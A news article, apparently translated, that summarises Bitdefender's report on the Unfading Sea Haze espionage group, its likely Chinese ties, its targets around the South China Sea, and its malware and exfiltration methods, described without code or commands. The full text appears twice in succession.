A group possibly linked to China has been terrorizing Asia for 6 years.
Bitdefender, a developer of antivirus solutions, is investigating the activities of a hacker group called Unfading Sea Haze . According to a recent report, this low-profile group has been operating since 2018 and is likely acting in the interests of China.
In their report, Bitdefender researchers describe in detail the attackers and methods of hacking Windows computers and then infecting them with spyware to steal data. Unfading Sea Haze attacks, which mainly target government and military targets, are highly sophisticated.
Experts have not been able to definitively establish the origin and true goals of Unfading Sea Haze. However, they confidently state that the attacks they have studied have nothing in common with the already known campaigns.
Analysts decided that the hackers were based in China, based on several factors: the choice of victims in the South China Sea, the use of tools popular among Chinese actors, as well as attack scenarios similar to the methods of another politically motivated gang-APT41.
The South China Sea is of great strategic importance to China from a geopolitical and economic point of view. Control of this region provides access to the Pacific Ocean and provides advantages in trade routes. At the same time, other states in the region — Malaysia, the Philippines, Vietnam and some others-claim certain sections of the sea. China also puts forward territorial claims to almost the entire water area, as evidenced by the so — called "nine-point line" - the designation of sea borders drawn on the maps of the PRC.
According to the report, the first successful Unfading Sea Haze attack on Windows systems dates back to at least 2018. Bitdefender was able to confirm that hackers used targeted phishing mailings to gain access, disguising malicious files as legitimate documents.
In total, at least eight organizations, mainly government agencies and military sector structures, became victims of Unfading Sea Haze. As indicated in the study, in March 2023, attackers upgraded their techniques, learning how to run malicious code directly from RAM without writing to the hard disk, which made it difficult to detect it.
Various malicious programs were installed on compromised systems, including Trojans from the Gh0st RAT family and the Ps2dllLoader utility. The malicious code disguised itself as legitimate scheduled tasks and harmless extensions, but actually loaded malicious DLLs to conduct covert espionage. These libraries intercepted keyboard keystrokes, stole confidential data stored in browsers, and scanned plug-in removable media.
All data collected by hackers, including stolen confidential files, was sent to attackers via FTP using the Curl utility. Initially, static credentials were used for access, "hardwired" into the malware code, but later the group switched to dynamic generation of usernames and passwords.
According to experts, the attackers from Unfading Sea Haze gradually changed both tactics and tools. Since the group was only just revealed, its innovations were probably part of a focused long-term plan, rather than a spontaneous response to emerging incidents.
A Bitdefender representative explained that the company is aware of the public interest, but for security reasons cannot disclose specific countries or organizations that have been targeted by hackers.
Bitdefender, a developer of antivirus solutions, is investigating the activities of a hacker group called Unfading Sea Haze . According to a recent report, this low-profile group has been operating since 2018 and is likely acting in the interests of China.
In their report, Bitdefender researchers describe in detail the attackers and methods of hacking Windows computers and then infecting them with spyware to steal data. Unfading Sea Haze attacks, which mainly target government and military targets, are highly sophisticated.
Experts have not been able to definitively establish the origin and true goals of Unfading Sea Haze. However, they confidently state that the attacks they have studied have nothing in common with the already known campaigns.
Analysts decided that the hackers were based in China, based on several factors: the choice of victims in the South China Sea, the use of tools popular among Chinese actors, as well as attack scenarios similar to the methods of another politically motivated gang-APT41.
The South China Sea is of great strategic importance to China from a geopolitical and economic point of view. Control of this region provides access to the Pacific Ocean and provides advantages in trade routes. At the same time, other states in the region — Malaysia, the Philippines, Vietnam and some others-claim certain sections of the sea. China also puts forward territorial claims to almost the entire water area, as evidenced by the so — called "nine-point line" - the designation of sea borders drawn on the maps of the PRC.
According to the report, the first successful Unfading Sea Haze attack on Windows systems dates back to at least 2018. Bitdefender was able to confirm that hackers used targeted phishing mailings to gain access, disguising malicious files as legitimate documents.
In total, at least eight organizations, mainly government agencies and military sector structures, became victims of Unfading Sea Haze. As indicated in the study, in March 2023, attackers upgraded their techniques, learning how to run malicious code directly from RAM without writing to the hard disk, which made it difficult to detect it.
Various malicious programs were installed on compromised systems, including Trojans from the Gh0st RAT family and the Ps2dllLoader utility. The malicious code disguised itself as legitimate scheduled tasks and harmless extensions, but actually loaded malicious DLLs to conduct covert espionage. These libraries intercepted keyboard keystrokes, stole confidential data stored in browsers, and scanned plug-in removable media.
All data collected by hackers, including stolen confidential files, was sent to attackers via FTP using the Curl utility. Initially, static credentials were used for access, "hardwired" into the malware code, but later the group switched to dynamic generation of usernames and passwords.
According to experts, the attackers from Unfading Sea Haze gradually changed both tactics and tools. Since the group was only just revealed, its innovations were probably part of a focused long-term plan, rather than a spontaneous response to emerging incidents.
A Bitdefender representative explained that the company is aware of the public interest, but for security reasons cannot disclose specific countries or organizations that have been targeted by hackers.
